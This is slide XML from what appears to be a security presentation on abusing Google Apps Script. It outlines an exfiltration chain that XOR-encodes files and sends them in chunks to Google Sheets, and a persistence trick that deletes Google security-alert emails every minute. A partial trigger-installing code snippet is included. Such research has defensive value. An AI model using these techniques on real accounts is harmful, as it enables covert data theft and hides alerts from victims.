              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{281B0C18-C839-843E-0707-B54C272EDC7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311711" y="2364581"/>
            <a:ext cx="8696558" cy="2678095"/>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788B8A6E-59BB-26E1-C7A9-45FF81A31633}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="408794" y="3088256"/>
            <a:ext cx="1350719" cy="1328113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2" descr="Comment utiliser des macros dans Google Sheet ? - DSI et chef de projet IT  externalisé sur Nantes.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53F72385-B022-7485-8A54-E8298E6AF9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3832" y="3382239"/>
            <a:ext cx="805532" cy="72498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avec flèche 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BF2F15E-C7AD-22E0-50B3-42F57EF09139}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947430" y="3834369"/>
            <a:ext cx="1685232"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B7A351C7-68A8-0AE9-DF49-2C8158F74444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1740466" y="2867848"/>
            <a:ext cx="2775449" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>List all files or with specific extensions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Base64 encode + XOR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> of 50,000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Send the chunks to Google Sheets (with filenames + extensions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="Hacker - Free people icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD89AEED-4FCF-C35F-748A-79B1395C4EC9}"/>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53267" y="3335779"/>
            <a:ext cx="779022" cy="77902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eur droit avec flèche 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38A7C999-3F8B-D3FC-75FB-6531D0CF8FE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6882748" y="3830927"/>
            <a:ext cx="1017068" cy="3442"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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ZoneTexte 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9556CB32-078A-AA66-4A07-4B6C064931AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5854884" y="2867848"/>
            <a:ext cx="3097300" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Google Sheets access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Retrieve all chunks for each files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>XOR + Base64 decode </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Files recovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07154F4B-1FCA-5336-DBD7-B564E6DFAD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2662" y="3452623"/>
            <a:ext cx="1380512" cy="722782"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Connecteur droit avec flèche 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C29779F-301F-1D41-4B84-844BDEBCE976}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5013174" y="3830927"/>
            <a:ext cx="662637" cy="0"/>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1154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Scenario #5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FE1C285-2BD6-617F-4CCD-EC7DD4B37D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350" y="1067032"/>
            <a:ext cx="4979100" cy="2193780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4472C4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36F5EB40-73A0-D1B0-46E4-18D32FDC87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9302" y="2835118"/>
            <a:ext cx="8625396" cy="851388"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4472C4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A07BC8C-E670-221D-8DCC-8830CA6BEDA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03875" y="3383683"/>
            <a:ext cx="6200775" cy="1385570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEAA538F-3CC6-3E3C-2724-AFE0E9EB625C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>35/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1966079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C27BB5-1701-6438-C5DF-406E7447D01F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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PlaceHolder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{089F3838-1844-5770-E599-207DF64E1F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457103" y="1884713"/>
            <a:ext cx="8346600" cy="1165668"/>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751"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" spc="-1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" spc="-1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t> Google Apps Script (GAS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="800" b="1" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Graphique 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F19B0AC-A107-5AA0-6CC0-645E70E72B12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7684560" y="4620960"/>
            <a:ext cx="1271880" cy="255600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1259634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Scenario #6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Sous-titre 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC270F5D-E53C-182B-1F0B-8E9773948A95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311710" y="1272521"/>
            <a:ext cx="8291269" cy="3770155"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>It is possible to install a trigger at the same time as the first execution of the function that would allow a regular trigger without any additional action necessary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Triggers can be based on schedule, time or from the attached file event like opening or modification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Triggers are linked to a Google App Scripts, this means victim needs write permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1450" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Our example scenario checks every minute if the victim has received a mail with title « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" i="1" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Security Alert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>» from Google and immediately delete it if so</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>All of our scenarios can be provided with a trigger, like time trigger to keep somehow persistence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E7D5FBE-CFE1-8153-94F7-13E56B3D362C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>36/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="846437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Scenario #6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle : coins arrondis 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F069C08B-097D-BEC9-BE5D-BB22FD671DC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5829300" y="959412"/>
            <a:ext cx="3210401" cy="3923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1400" b="1" dirty="0"/>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>snippet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>runScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  var doc = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>DocumentApp.getActiveDocument</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  var triggers = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>ScriptApp.getUserTriggers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>(doc);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>triggers.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t> == 0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>createTimeTriggerEveryNMinutes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  // Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>something</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>evil</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>createTimeTriggerEveryNMinutes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>ScriptApp.newTrigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>runScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>   .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>timeBased</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>   .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>everyMinutes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>(1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>   .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
